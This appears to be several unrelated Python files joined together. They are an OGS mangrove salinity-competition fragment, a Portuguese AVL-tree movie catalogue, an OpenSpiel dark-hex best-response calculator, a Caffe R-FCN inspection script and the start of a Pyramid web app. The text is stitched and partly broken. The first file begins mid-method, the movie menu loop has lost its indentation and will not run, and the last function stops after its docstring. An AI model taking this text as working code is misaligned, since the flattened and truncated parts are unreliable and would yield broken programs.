        for tree_id in range(len(self._tree_constant_contribution)):
            ids = self._tree_cell_ids[tree_id]
            mean_salinity_for_tree = np.mean(salinity[ids])
            belowground_resource = (
                (self._tree_constant_contribution[tree_id] +
                 mean_salinity_for_tree *
                 self._tree_salinity_prefactor[tree_id]) /
                self._tree_constant_contribution[tree_id])
            self.belowground_resources.append(belowground_resource)

    ## This functions prepares the next timestep for the competition
    #  concept. In the OGS concept, information on t_ini and t_end is stored.
    #  Additionally, arrays are prepared to store information on water uptake
    #  of the participating trees. Moreover, the ogs-prj-file for the next
    #  timestep is updated and saved in the ogs-project folder.
    #  @param t_ini: initial time of next timestep
    #  @param t_end: end time of next timestep
    def prepareNextTimeStep(self, t_ini, t_end):
        self._t_ini = t_ini
        self._t_end = t_end
        self._xml_t_initial.text = str(self._t_ini)
        self._xml_t_end.text = str(self._t_end)
        self._tree_cell_ids = []
        self._tree_constant_contribution = []
        self._tree_salinity_prefactor = []
        self._constant_contributions = np.zeros_like(self._volumes)
        self._salinity_prefactors = np.zeros_like(self._volumes)
        self._t_end_list.append(self._t_end)
        # remember the very first initial time of the simulation
        # (idiomatic replacement of the former try/except AttributeError probe)
        if not hasattr(self, "_t_ini_zero"):
            self._t_ini_zero = self._t_ini
        ## List containing reduction factor for each tree
        self.belowground_resources = []

    ## This function copies the python script which defines BC and source
    #  terms to the ogs project folder, substituting result-file names,
    #  abiotic drivers, the source mesh path and the write time on the way.
    def copyPythonScript(self):
        if self._use_external_python_script:
            source_name = path.join(self._ogs_project_folder,
                                    self._external_python_script)
        else:
            source_name = path.join(path.dirname(path.abspath(__file__)),
                                    "python_source.py")
        target_name = path.join(self._ogs_project_folder, "python_source.py")
        constants_filename = path.join(self._ogs_project_folder,
                                       "constant_contributions.npy")
        prefactors_filename = path.join(self._ogs_project_folder,
                                        "salinity_prefactors.npy")
        cumsum_filename = path.join(self._ogs_project_folder,
                                    "cumsum_salinity.npy")
        calls_filename = path.join(self._ogs_project_folder,
                                   "calls_in_last_timestep.npy")
        # BUGFIX: use context managers so both files are closed even when an
        # exception occurs (the previous implementation leaked the handles).
        with open(source_name, "r") as source, open(target_name,
                                                    "w") as target:
            for line in source:
                if self._abiotic_drivers:
                    for abiotic_factor in self._abiotic_drivers.iterchildren():
                        if (abiotic_factor.tag + " = ") in line:
                            line = (abiotic_factor.tag + " = " +
                                    abiotic_factor.text + "\n")
                if "constant_contributions.npy" in line:
                    line = line.replace("constant_contributions.npy",
                                        constants_filename)
                if "salinity_prefactors.npy" in line:
                    line = line.replace("salinity_prefactors.npy",
                                        prefactors_filename)
                if "cumsum_salinity.npy" in line:
                    line = line.replace("cumsum_salinity.npy", cumsum_filename)
                if "calls_in_last_timestep.npy" in line:
                    line = line.replace("calls_in_last_timestep.npy",
                                        calls_filename)
                if "CellInformation(source_mesh)" in line:
                    line = line.replace(
                        "source_mesh",
                        "'" + path.join(self._ogs_project_folder,
                                        self._source_mesh_name) + "'")
                if "t_write = t_end" in line:
                    line = line.replace("t_end", str(self._t_end))
                target.write(line)
|
<reponame>pauloprojject/projectED
# -*- coding: utf-8 -*-
"""ProjetoED2.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1m7cjca9CLUc5wNSFW2zfVq_KRzRYlhgW
# Tree Exception
"""
class BinaryTreeException(Exception):
    """Exception raised for binary-tree specific errors."""

    def __init__(self, mensagem):
        # forward the message straight to the base Exception
        Exception.__init__(self, mensagem)
"""# Dado"""
class Dado:
    """Movie record holding an ``id``, a ``nome`` (title) and an ``ano``
    (release year); all three are read/write properties."""

    def __init__(self, id, nome, ano):
        self._id = id
        self._nome = nome
        self._ano = ano

    # properties built explicitly instead of with decorators
    def _get_nome(self):
        return self._nome

    def _set_nome(self, novo):
        self._nome = novo

    nome = property(_get_nome, _set_nome)

    def _get_ano(self):
        return self._ano

    def _set_ano(self, novo):
        self._ano = novo

    ano = property(_get_ano, _set_ano)

    def _get_id(self):
        return self._id

    def _set_id(self, novo):
        self._id = novo

    id = property(_get_id, _set_id)

    def __str__(self):
        # same rendering as before: bracketed multi-line record
        corpo = f' id: {self.id},\n filme: {self.nome},\n ano de lançamento: {self.ano}\n'
        return '[\n' + corpo + ']'
"""# Nó"""
class No:
    """Binary-tree node: wraps one Dado record plus esq/dir child links."""

    def __init__(self, dado=None):
        # dado: the payload (expected to be a Dado instance, or None).
        self._dado = dado
        # esq/dir: left and right child No instances, or None.
        self._esq = None
        self._dir = None

    # -- accessors ------------------------------------------------------
    @property
    def dado(self):
        """Payload record stored at this node."""
        return self._dado

    @dado.setter
    def dado(self, novo):
        self._dado = novo

    @property
    def esq(self):
        """Left child subtree."""
        return self._esq

    @esq.setter
    def esq(self, novo):
        self._esq = novo

    @property
    def dir(self):
        """Right child subtree."""
        return self._dir

    @dir.setter
    def dir(self, novo):
        self._dir = novo

    # Read-only convenience views over the payload.
    @property
    def nome(self):
        return self._dado.nome

    @property
    def id(self):
        return self._dado.id

    @property
    def ano(self):
        return self._dado.ano

    def balanco(self):
        """Balance factor: left-subtree height minus right-subtree height."""
        prof_esq = 0
        if self.esq:
            prof_esq = self.esq.profundidade()
        prof_dir = 0
        if self.dir:
            prof_dir = self.dir.profundidade()
        return prof_esq - prof_dir

    def profundidade(self):
        """Height of the subtree rooted here (1 for a leaf)."""
        prof_esq = 0
        if self.esq:
            prof_esq = self.esq.profundidade()
        prof_dir = 0
        if self.dir:
            prof_dir = self.dir.profundidade()
        return 1 + max(prof_esq, prof_dir)

    def balanco_exec(self):
        """Rebalance this subtree (AVL-style rotations) and return its new root.

        NOTE(review): relies on the module-level rotacao_esq/rotacao_dir
        functions defined later in this file being resolvable at call time.
        """
        a = self.balanco()
        if a > 1:
            # Left-heavy; a left-right case rotates the left child first.
            if self.esq.balanco() < 0:
                self.esq = rotacao_esq(self.esq)
            self = rotacao_dir(self)
            return self
        elif a < -1:
            # Right-heavy; a right-left case rotates the right child first.
            if self.dir.balanco() > 0:
                self.dir = rotacao_dir(self.dir)
            self = rotacao_esq(self)
            return self
        else:
            return self

    ######## <stack_overflow>
    # ASCII-art tree printer adapted from a Stack Overflow answer.
    def display(self):
        """Print the subtree as ASCII art, one layout row per line."""
        lines, *_ = self._display_aux()
        for line in lines:
            print(line)

    def _display_aux(self):
        """Returns list of strings, width, height, and horizontal coordinate of the root."""
        # No child.
        if self.dir is None and self.esq is None:
            line = '%s' % self.dado.id
            width = len(line)
            height = 1
            middle = width // 2
            return [line], width, height, middle
        # Only esq child.
        if self.dir is None:
            lines, n, p, x = self.esq._display_aux()
            s = '%s' % self.dado.id
            u = len(s)
            first_line = (x + 1) * ' ' + (n - x - 1) * '_' + s
            second_line = x * ' ' + '/' + (n - x - 1 + u) * ' '
            shifted_lines = [line + u * ' ' for line in lines]
            return [first_line, second_line] + shifted_lines, n + u, p + 2, n + u // 2
        # Only dir child.
        if self.esq is None:
            lines, n, p, x = self.dir._display_aux()
            s = '%s' % self.dado.id
            u = len(s)
            first_line = s + x * '_' + (n - x) * ' '
            second_line = (u + x) * ' ' + '\\' + (n - x - 1) * ' '
            shifted_lines = [u * ' ' + line for line in lines]
            return [first_line, second_line] + shifted_lines, n + u, p + 2, u // 2
        # Two children.
        esq, n, p, x = self.esq._display_aux()
        dir, m, q, y = self.dir._display_aux()
        s = '%s' % self.dado.id
        u = len(s)
        first_line = (x + 1) * ' ' + (n - x - 1) * '_' + s + y * '_' + (m - y) * ' '
        second_line = x * ' ' + '/' + (n - x - 1 + u + y) * ' ' + '\\' + (m - y - 1) * ' '
        # Pad the shorter side so both columns have equal height before zip.
        if p < q:
            esq += [n * ' '] * (q - p)
        elif q < p:
            dir += [m * ' '] * (p - q)
        zipped_lines = zip(esq, dir)
        lines = [first_line, second_line] + [a + u * ' ' + b for a, b in zipped_lines]
        return lines, n + m + u, max(p, q) + 2, n + u // 2
    ######## </stack_overflow>
"""# Tree"""
class BinaryTree:
    """Traversal helper for the film tree."""

    def inOrder(self, arvore):
        """Print node ids in ascending (in-order) sequence, space-separated."""
        if arvore is None:
            return
        self.inOrder(arvore.esq)
        print(arvore.dado.id, end=' ')
        self.inOrder(arvore.dir)
def rotacao_dir(arvore):
    """Right-rotate around *arvore*: its left child becomes the new subtree root."""
    nova_raiz = arvore.esq
    # The pivot's right subtree moves across to fill the vacated left slot.
    arvore.esq = nova_raiz.dir
    nova_raiz.dir = arvore
    return nova_raiz
def rotacao_esq(arvore):
    """Left-rotate around *arvore*: its right child becomes the new subtree root."""
    nova_raiz = arvore.dir
    # The pivot's left subtree moves across to fill the vacated right slot.
    arvore.dir = nova_raiz.esq
    nova_raiz.esq = arvore
    return nova_raiz
def insere(raiz, no):
    """Insert node *no* below *raiz*, ordered by Dado id (plain BST insert).

    Ids larger than the current node's go right; smaller or equal ids go
    left. Rebalancing is done separately via No.balanco_exec().
    Fix: `is None` identity checks instead of `== None` (PEP 8 idiom).
    """
    if raiz.dado.id < no.dado.id:
        if raiz.dir is None:
            raiz.dir = no
        else:
            insere(raiz.dir, no)
    else:
        if raiz.esq is None:
            raiz.esq = no
        else:
            insere(raiz.esq, no)
def buscaID(raiz, chave):
    """Look up a film by id, iteratively walking the BST.

    Returns a formatted 'Nome/Ano' string, or the literal
    'chave não encontrada' when the id is absent.
    Raises BinaryTreeException for a non-int key or an empty tree.
    Fixes: isinstance() instead of type() comparison, `is None` identity
    checks, and the two-branch descent collapsed into one expression.
    """
    if not isinstance(chave, int):
        raise BinaryTreeException('apenas números')
    if raiz.dado is None:
        raise BinaryTreeException('Árvore vazia')
    atual = raiz
    while atual.id != chave:
        atual = atual.esq if chave < atual.id else atual.dir
        if atual is None:
            return 'chave não encontrada'
    return f'Nome: {atual.dado.nome}, Ano: {atual.dado.ano}'
def buscaANO(raiz, chave):
    """Print every film whose release year equals *chave* (reverse in-order).

    Bug fix: the original returned 'chave não encontrada' at the first
    non-matching node, which aborted the traversal and silently skipped
    that node's entire left subtree. Now the whole tree is always visited
    and every match is printed.
    """
    if raiz is None:
        return
    buscaANO(raiz.dir, chave)
    if raiz.dado.ano == chave:
        print(raiz.dado)
    buscaANO(raiz.esq, chave)
"""# Menu"""
nomes = []
print('Adiciona o nó raiz:')
nome = input("Insira o nome do filme: ")
nomes.append(nome)
idd = int(input("Insira o ID do filme: "))
ano = int(input("Insira o ano de lançamento do filme: "))
filme = Dado(idd,nome,ano)
raiz = No(filme)
while True:
menu = int(input("Selecione uma alternativa:\n(1) Inserir\n(2) Buscar por ID\n(3) Buscar filme por ano\n(4) Listar filmes em ordem alfabética\n(5) Altura da árvore\n(6) Exibir a árvore\n(7) Sair\n"))
if menu == 7:
break
if menu == 1:
while True:
nome = input("Insira o nome do filme: ")
nomes.append(nome)
idd = int(input("Insira o ID do filme: "))
ano = int(input("Insira o ano de lançamento do filme: "))
filme = Dado(idd,nome,ano)
add = No(filme)
insere(raiz, add)
raiz = raiz.balanco_exec()
loop = input("Deseja adicionar outro filme? S/N \n").upper()
if loop == 'N':
break
if menu == 2:
while True:
pesq = int(input("Insira o ID do filme: "))
print(f'O filme do id {pesq} é:')
print(buscaID(raiz, pesq))
loop = input("Deseja pesquisar outro filme? N para negativo \n").upper()
if loop == 'N':
break
if menu == 3:
while True:
pesq = int(input("Insira o ano de lançamento do filme: "))
print('O(s) filme(s) desse ano é(são):')
buscaANO(raiz, pesq)
loop = input("Deseja pesquisar outro filme? N para negativo \n").upper()
if loop == "N":
break
if menu == 4:
print(sorted(nomes))
if menu == 5:
print('A altura da árvore é: ' + str(raiz.profundidade()))
if menu == 6:
opc = int(input("(1) Modo avaliação\n(2) Modo bonito \n"))
if opc == 1:
tree = BinaryTree()
tree.inOrder(raiz)
elif opc == 2:
raiz.display()
else:
print("opção invalida") |
"""
Using open_spiel dark_hex implementation
to calculate best response value for a given player strategy.
"""
import typing
from collections import defaultdict
import pydot
from decimal import Decimal
import pyspiel
from darkhex.utils.util import (get_open_spiel_state, save_file)
class Node:
    """Best response strategy state node, keyed by (info_state, wait_node)."""

    def __init__(self,
                 info_state: str,
                 reach_prob: float,
                 wait_node: bool,
                 value: float = 0.,
                 is_terminal: bool = False):
        # Identity of the node within the tree.
        self.info_state = info_state
        self.wait_node = wait_node
        self.node_key = (info_state, wait_node)
        # Search bookkeeping.
        self.reach_prob = reach_prob
        self.value = value
        self.is_terminal = is_terminal
        # action -> [action_node, wait_node]; slot 0 is the acting successor,
        # slot 1 the waiting successor. Slot 1 may stay None; slot 0 of a
        # populated action never is. Wait nodes always carry wait_node=True.
        self.children = defaultdict(lambda: [None, None])
        self.best_action = None

    def __repr__(self):
        return f"{self.info_state}:{self.reach_prob}:{self.value}:{self.wait_node}"
class BRTree:
    """
    Best Response tree functionality. Driver for the Nodes.

    Non-terminal nodes are cached in `self.nodes` keyed by
    (info_state, wait_node), so repeated information states share one Node.
    Terminal nodes are NOT cached; they hang off their parent's children
    and accumulate reach probability when reached again.
    """

    def __init__(self, br_player: int):
        self.root = None  # set by the caller (see BestResponse.best_response)
        # NOTE(review): keys are (info_state, wait_node) tuples, not plain
        # strings — the type comment below looks stale.
        self.nodes = {}  # type: typing.Dict[str, Node]
        self.br_player = br_player  # player index the best response is computed for

    def add_node(self,
                 state: pyspiel.State,
                 reach_prob: float,
                 parent: Node = None,
                 action: int = None,
                 value: float = 0.):
        """ Add a node to the tree.

        Creates (or reuses) the Node for `state` as seen by the BR player
        and links it under `parent` via `action`. Returns the cached Node.
        """
        info_state = state.information_state_string(self.br_player)
        # "Wait node": the BR player has no legal action here (opponent acts).
        wait_node = len(state.legal_actions(self.br_player)) == 0
        key = (info_state, wait_node)
        if key not in self.nodes:
            self.nodes[key] = Node(info_state, reach_prob, wait_node, value)
        # Connect the node to the parent
        if parent is not None:
            parent_node = self.get_node(parent.node_key)
            if parent_node is not self.nodes[key]:
                if parent_node.wait_node:
                    # Wait parents have one successor slot, stored under the
                    # sentinel action key -1.
                    parent_node.children[-1] = [self.nodes[key], None]
                else:
                    # Slot index 0/1 selects action-node vs wait-node child.
                    parent_node.children[action][int(
                        self.nodes[key].wait_node)] = self.nodes[key]
        return self.nodes[key]

    def add_terminal_node(self,
                          state: pyspiel.State,
                          parent: Node = None,
                          action: int = None,
                          reach_prob: float = Decimal('1.0'),
                          value: float = 0.):
        """ Add a terminal node to the tree.

        Terminal nodes are stored only on the parent; a repeat visit adds
        its reach probability to the existing child instead of duplicating.
        """
        wait_node = len(state.legal_actions(self.br_player)) == 0
        parent_node = self.get_node(parent.node_key)
        if parent_node.children[action][int(wait_node)] is not None:
            parent_node.children[action][int(
                wait_node)].reach_prob += reach_prob
        else:
            # ':T:{action}' suffix disambiguates terminals sharing an info state.
            parent_node.children[action][int(wait_node)] = Node(
                state.information_state_string(self.br_player) + f':T:{action}',
                reach_prob,
                wait_node,
                value,
                is_terminal=True)

    def get_node(self, node_key: tuple) -> Node:
        """
        Get a node from the tree. Returns None for an unknown key.
        """
        return self.nodes.get(node_key, None)
class BestResponse:
    """Best-response computation against a fixed dark-hex strategy.

    Expands all states reachable under `strategy`, backs terminal values up
    a BRTree (max over the BR player's actions, sum over opponent/wait
    branches), extracts a greedy best-response strategy, saves it to
    `file_path`, and reports how well the given strategy holds up.
    """

    def __init__(
            self,
            game: pyspiel.Game,
            strategy_player: int,
            initial_state: str,
            num_cols: int,
            strategy: typing.Dict[str, typing.List[typing.Tuple[int, float]]],
            file_path: str,
    ):
        self.game = game
        self.s_player = strategy_player       # player following `strategy`
        self.br_player = 1 - strategy_player  # player we compute the BR for
        self.initial_state = initial_state
        self.strategy = strategy              # info_state -> [(action, prob), ...]
        self.num_cols = num_cols
        self.file_path = file_path            # where the BR strategy is saved
        # Memo of expanded full states (both players' info strings joined).
        self.full_game_state_cache = {}

    @staticmethod
    def _br_value(val: float) -> float:
        """Convert a raw game return to the Decimal used throughout the tree."""
        # return (val + 1) / 2
        return Decimal(str(val))

    def _generate_value_tree(
            self,
            cur_state: pyspiel.State,
            br_tree: BRTree,
            parent_node: Node,
            reach_prob: Decimal = Decimal('1.0')) -> float:
        """
        Generate the value tree for the best response player playing against
        the given player strategy.

        value is always in perspective of the best response player. Only the
        terminal states are assigned a value for now, later on we backpropagate
        to update the value of the parent states.
        """
        cur_player = cur_state.current_player()
        info_state = cur_state.information_state_string()
        # Dedupe on the concatenated info-state pair so each full game state
        # is expanded exactly once.
        full_state = cur_state.information_state_string(0) + \
            cur_state.information_state_string(1)
        if full_state in self.full_game_state_cache:
            return
        self.full_game_state_cache[full_state] = True
        if cur_player == self.br_player:
            # best response players turn: branch on every legal action.
            for action in cur_state.legal_actions():
                next_state = cur_state.child(action)
                if next_state.is_terminal():
                    value = self._br_value(next_state.returns()[self.br_player])
                    br_tree.add_terminal_node(next_state, parent_node, action,
                                              reach_prob, value)
                else:
                    new_node = br_tree.add_node(next_state, reach_prob,
                                                parent_node, action)
                    self._generate_value_tree(next_state, br_tree, new_node,
                                              reach_prob)
            return
        # strategy players turn: branch on the strategy's action distribution,
        # scaling reach probability by each action's weight.
        for action, prob in self.strategy[info_state]:
            next_state = cur_state.child(action)
            if next_state.is_terminal():
                value = self._br_value(next_state.returns()[self.br_player])
                decimal_prob = Decimal(str(prob)) * Decimal(str(reach_prob))
                br_tree.add_terminal_node(next_state, parent_node, action,
                                          decimal_prob, value)
            else:
                decimal_prob = Decimal(str(prob)) * Decimal(str(reach_prob))
                new_node = br_tree.add_node(next_state, decimal_prob,
                                            parent_node, action)
                self._generate_value_tree(next_state, br_tree, new_node,
                                          decimal_prob)

    def _backpropogate_values(self, br_tree: BRTree, cur_node: Node = None):
        """
        Backpropogate the values from the terminal nodes to the parent nodes.

        Terminal values are weighted by their reach probability; wait nodes
        sum their children, action nodes take the max over actions.
        NOTE(review): the "backpropogate" spelling is kept as-is since it is
        part of the public name.
        """
        if cur_node is None:
            cur_node = br_tree.root
        if cur_node.is_terminal:
            # Terminal node: fold reach probability into the stored value.
            cur_node.value *= cur_node.reach_prob
            return cur_node.value
        tot_value = Decimal('0.0')
        mx_value = Decimal('-inf')
        for action, children in cur_node.children.items():
            # Each action's value is the sum over its action/wait child pair.
            children_value = Decimal('0.0')
            for child in children:
                if child is not None:
                    children_value += self._backpropogate_values(br_tree, child)
            tot_value += children_value
            mx_value = max(mx_value, children_value)
        if cur_node.wait_node:
            # Opponent to act: expectation over branches (sum of weighted values).
            cur_node.value = tot_value
            return tot_value
        # BR player to act: pick the best action.
        cur_node.value = mx_value
        return mx_value

    def best_response_strategy(self, br_strategy_info):
        """
        Calculate the best response strategy for the given player strategy and
        calculated best response values.
        br_strategy is greedy. So always: br_strategy[info_state] = [(action,1)]
        """
        br_strategy: typing.Dict[str, typing.List[typing.Tuple[int,
                                                               float]]] = {}
        for (info_state, wait_node), cur_node in br_strategy_info.items():
            if wait_node:
                # Wait nodes have no decision for the BR player.
                continue
            # find the best action for the given info state
            best_action = None
            best_value = Decimal('-inf')
            for action, children in cur_node.children.items():
                children_value = Decimal('0.0')
                for child in children:
                    if child is None:
                        continue
                    children_value += child.value
                if children_value > best_value:
                    best_value = children_value
                    best_action = action
            br_strategy[info_state] = [(best_action, 1.0)]
            cur_node.best_action = best_action
        return br_strategy

    def _calculate_br_value(self, cur_state: pyspiel.State) -> float:
        """
        Calculate the best response value for the given player strategy and
        calculated opponent strategy.

        NOTE(review): requires self.strategies (both players' strategies) to
        have been set by best_response() before this is called.
        """
        br_value = Decimal('0.0')
        cur_player = cur_state.current_player()
        info_state = cur_state.information_state_string()
        for action, prob in self.strategies[cur_player][info_state]:
            new_state = cur_state.child(action)
            if new_state.is_terminal():
                # Map returns in [-1, 1] to a win probability in [0, 1].
                value = (Decimal(str(new_state.returns()[self.br_player])) \
                    + Decimal('1.0')) / Decimal('2.0')
            else:
                value = self._calculate_br_value(new_state)
            br_value += Decimal(str(value)) * Decimal(str(prob))
        return br_value

    @staticmethod
    def graph_test(br_tree: BRTree, file_path: str):
        """
        Draw the tree graph.

        Renders every node (wait nodes filled red) and edge, labelled with
        the action, to a PNG via pydot. Debug aid only.
        """
        graph = pydot.Dot(graph_type='digraph')
        for node in br_tree.nodes.values():
            node_id = node.info_state + '\n' + str(node.value) + '\n' + str(
                node.reach_prob) + '\n' + str(node.wait_node)
            if node.wait_node:
                graph.add_node(
                    pydot.Node(node_id, style='filled', fillcolor='#ff0000'))
            else:
                graph.add_node(pydot.Node(node_id))
        for node in br_tree.nodes.values():
            node_id = node.info_state + '\n' + str(node.value) + '\n' + str(
                node.reach_prob) + '\n' + str(node.wait_node)
            for action, children in node.children.items():
                for child in children:
                    if child is None:
                        continue
                    ch_info = child.info_state + '\n' + str(
                        child.value) + '\n' + str(
                            child.reach_prob) + '\n' + str(child.wait_node)
                    graph.add_edge(
                        pydot.Edge(node_id, ch_info, label=str(action)))
        graph.write_png(file_path)

    def best_response(self):
        """
        Calculate the best response value for the given player strategy.
        """
        game_state = get_open_spiel_state(self.game, self.initial_state)
        # Generate the BR tree
        br_tree = BRTree(self.br_player)
        br_tree.root = br_tree.add_node(game_state, Decimal('1.0'))
        self._generate_value_tree(game_state, br_tree, br_tree.root)
        # Backpropogate the values
        self._backpropogate_values(br_tree)
        # graph test
        # self.graph_test(br_tree, 'tmp/br_tree.png')
        # Generate best response strategy
        br_strategy = self.best_response_strategy(br_tree.nodes)
        # self.br_strategy = load_file(self.file_path)
        # calculate the best response value
        self.strategies = {
            self.s_player: self.strategy,
            self.br_player: br_strategy,
        }
        # 1 - BR value: the lower the BR can push us, the worse `strategy` is.
        br_value = 1 - self._calculate_br_value(
            game_state)  # how good the given strategy is
        # write the opponent strategy to a file
        save_file(br_strategy, self.file_path)
        return br_value
|
# -----------------------------------------------------------------------------
# Python 2 one-off inspection script (print statements, xrange) for an R-FCN
# Caffe model: runs the RPN for proposals, re-runs the detection net on them,
# prints the top detections, saves visualisations, and dumps blobs to .mat.
# Paths, GPU id and model names are hard-coded for a specific machine.
# -----------------------------------------------------------------------------
import sys
sys.path.append('/net/wujial/py-R-FCN/caffe/python')
sys.path.append('/net/wujial/py-R-FCN/lib')
import caffe
import numpy as np
import scipy.io as sio
from plot_fig import *
from fast_rcnn.test import _get_blobs
from fast_rcnn.bbox_transform import clip_boxes, bbox_transform_inv
import cv2
from fast_rcnn.config import cfg
cfg.TEST.HAS_RPN = True
cfg.TRAIN.SCALE = (600,)
cfg.TEST.SCALE = (600,)
model_name = 'residual_pos_neg_attention_18'
#model_name = 'rfcn_alt_opt_5step_ohem'
#imdir = '/net/wujial/py-R-FCN/data/demo/006177.jpg'
imdir = "/net/wujial/py-R-FCN/VOCdevkit/VOC2007/JPEGImages/000001.jpg"
im = cv2.imread(imdir)
rpn_proto = "/net/wujial/py-R-FCN/models/pascal_voc/ResNet-50/rfcn_alt_opt_5step_ohem/rpn_test.pt"
rpn_model = "/net/wujial/py-R-FCN/output/rfcn_alt_opt_5step_ohem/voc_2007_trainval/stage1_rpn_final.caffemodel"
prototxt = '/net/wujial/py-R-FCN/models/pascal_voc/ResNet-50/' + model_name + '/soft_rfcn_test.pt'
model = '/net/wujial/py-R-FCN/models/pascal_voc/ResNet-50/' + model_name + '/resnet50_rfcn_mask_ohem_iter_80000.caffemodel'
#model = '/net/wujial/py-R-FCN/models/pascal_voc/ResNet-50/' + model_name + '/stage1_mask_rfcn_final.caffemodel'
#model = "/net/wujial/py-R-FCN/models/pascal_voc/ResNet-50/rfcn_alt_opt_5step_ohem/resnet50_rfcn_ohem_iter_120000.caffemodel"
# --- Stage 1: region proposal network ---------------------------------------
caffe.set_mode_gpu()
caffe.set_device(2)
rfcn_net = caffe.Net(rpn_proto,rpn_model, caffe.TEST)
blobs, im_scales = _get_blobs(im, None)
im_blob = blobs['data']
blobs['im_info'] = np.array([[im_blob.shape[2], im_blob.shape[3], im_scales[0]]], dtype=np.float32)
rfcn_net.blobs['data'].reshape(*(blobs['data'].shape))
rfcn_net.blobs['im_info'].reshape(*(blobs['im_info'].shape))
forward_kwargs = {'data': blobs['data'].astype(np.float32, copy=False)}
forward_kwargs['im_info'] = blobs['im_info'].astype(np.float32, copy=False)
blobs_out = rfcn_net.forward(**forward_kwargs)
rois = rfcn_net.blobs['rois'].data.copy()
# ROIs are [batch_idx, x1, y1, x2, y2] in the scaled image; undo the scale.
boxes = rois[:, 1:5] / im_scales[0]
# --- Stage 2: detection network on the proposals ----------------------------
cfg.TEST.HAS_RPN = False
blobs, im_scales = _get_blobs(im, boxes)
rfcn_net = caffe.Net( prototxt , model, caffe.TEST)
#blobs, im_scales = _get_blobs(im, pred_boxes)
# Hash ROIs to find duplicates (standard py-faster-rcnn dedup trick).
v = np.array([1, 1e3, 1e6, 1e9, 1e12])
hashes = np.round(blobs['rois'] * cfg.DEDUP_BOXES).dot(v)
_, index, inv_index = np.unique(hashes, return_index=True,return_inverse=True)
caffe.set_mode_gpu()
caffe.set_device(2)
rfcn_net.blobs['data'].reshape(*(blobs['data'].shape))
rfcn_net.blobs['rois'].reshape(*(blobs['rois'].shape))
forward_kwargs = {'data': blobs['data'].astype(np.float32, copy=False)}
forward_kwargs['rois'] = blobs['rois'].astype(np.float32, copy=False)
blobs_out = rfcn_net.forward(**forward_kwargs)
scores = blobs_out['cls_prob']
box_deltas = blobs_out['bbox_pred']
# NOTE(review): bbox_means/stds look like training-time bbox-target
# normalisation constants baked in by hand — confirm against the train config.
bbox_means = [0.0, 0.0, 0.0, 0.0, 1.03960042775271e-10,0.00622199373803706,0.0207805908339361,0.0524860248101128]
bbox_stds = [0.0 ,0.0, 0.0, 0.0, 0.131444678954748,0.125309184804088,0.249703604170591,0.216150527133179]
box_deltas = box_deltas * (np.repeat(bbox_stds, box_deltas.shape[0]).reshape(box_deltas.shape[0], 8 )) + np.repeat(bbox_means, box_deltas.shape[0]).reshape(box_deltas.shape[0], 8 )
#box_deltas = box_deltas[inv_index,:]
pred_boxes = bbox_transform_inv(blobs['rois'][:,1:5] / im_scales[0], box_deltas)
pred_boxes = clip_boxes(pred_boxes, im.shape)
#scores = scores[inv_index, :]
#pred_boxes = pred_boxes[inv_index, :]
data = rfcn_net.blobs['data'].data
#mask = rfcn_net.blobs['Sig_pos_mask'].data
#soft_roi_cls = rfcn_net.blobs['roi_pool_pos_cls'].data
# Pick the ROIs classified as any foreground class and rank them by score.
cls = scores.argmax(axis = 1)
ind = np.where(cls > 0)[0][0]
ind1 = np.where(cls > 0)[0][1]
ind2 = np.where(cls > 0)[0][2]
imim = blobs['data'][0,0,:,:]
inds = np.where(cls > 0)[0]
tmp = scores[inds,cls[inds]]
tmptmp = np.argsort(tmp)
pred_boxes = pred_boxes * im_scales[0]
print pred_boxes[inds[tmptmp[-1]],4:8]
print pred_boxes[inds[tmptmp[-2]],4:8]
print pred_boxes[inds[tmptmp[-3]],4:8]
# NOTE(review): the loop index i is unused and the same three images are
# rewritten on every iteration — likely a leftover from a per-box save loop;
# confirm intent before relying on the output files.
for i in xrange(pred_boxes.shape[0]):
    save_imagesc(imim ,detection =pred_boxes[inds[tmptmp[-1]],4:8].reshape((1,4)),name= 'img0')
    save_imagesc(imim ,detection =pred_boxes[inds[tmptmp[-2]],4:8].reshape((1,4)),name= 'img1')
    save_imagesc(imim ,detection =pred_boxes[inds[tmptmp[-3]],4:8].reshape((1,4)),name= 'img2')
#for i in range(25):
#    save_imagesc(soft_roi_cls[ind,0*25 + i,:,:],'fig/background_%d'%i)
#    save_imagesc(soft_roi_cls[ind,18*25+ i,:,:],'fig/foreground_%d'%i)
#    save_imagesc(mask[0, i,:,:],None,'fig/mask_%d'%i)
# --- Dump intermediate blobs for offline (MATLAB) inspection -----------------
saveto = 'test_out.mat'
netdata = dict()
netdata['data'] = data
netdata['im_scales'] = im_scales[0]
#netdata['output'] = net.blobs['proposal'].data
#netdata['mask'] = mask
netdata['scores'] = scores
netdata['pred_boxes'] = pred_boxes
#netdata['rfcn_neg_cls_soft'] = rfcn_net.blobs['rfcn_neg_cls_soft'].data
netdata['rfcn_pos_cls_soft'] = rfcn_net.blobs['rfcn_pos_cls_soft'].data
netdata['data'] = rfcn_net.blobs['data'].data
netdata['Sig_pos_mask'] = rfcn_net.blobs['Sig_pos_mask'].data
netdata['Sig_neg_mask'] = rfcn_net.blobs['Sig_neg_mask'].data
netdata['cls_score'] = rfcn_net.blobs['cls_score'].data
netdata['rois'] = rfcn_net.blobs['rois'].data
netdata['deterministic'] = rfcn_net.blobs['deterministic'].data
netdata['roi_pool_pos_mask'] = rfcn_net.blobs['roi_pool_pos_mask'].data
netdata['roi_pool_neg_mask'] = rfcn_net.blobs['roi_pool_neg_mask'].data
sio.savemat(saveto,netdata)
from pyramid.response import Response
from pyramid.request import Request
from pyramid.view import view_config
from pyramid.httpexceptions import (
HTTPNotFound,
HTTPInternalServerError,
HTTPForbidden,
HTTPUnauthorized
)
import logging
log = logging.getLogger(__name__)
import sys
import time
from lxml import etree, html
import networkx as nx
from networkx.readwrite import json_graph
import io
import os
import os.path
import datetime
import json
from .config import Config
from .Helpers import *
from .Network import Network
from .Entity import Entity
from .config import Config
@view_config(route_name='health-check', request_method='GET', renderer='string')
def health_check(request):
    """
    Show the health check view.

    Returns 'OK' when MongoDB answers a trivial query; raises
    HTTPInternalServerError when the database is unreachable.
    """
    log.info("GET {0} - {1} - {2}".format(request.path, request.remote_addr, request.user_agent))
    # is mongo ok?
    try:
        db = mdb(request)
        db.health_check.find_one()
        return 'OK'
    except Exception:
        # Fix: a bare `except:` also swallowed SystemExit/KeyboardInterrupt;
        # catch Exception and log the cause before reporting the 500.
        log.exception('health check failed')
        raise HTTPInternalServerError
@view_config(route_name='home', request_method='GET', renderer='json')
def home_page(request):
    """Return the sites the caller may access, reduced to code/name/url."""
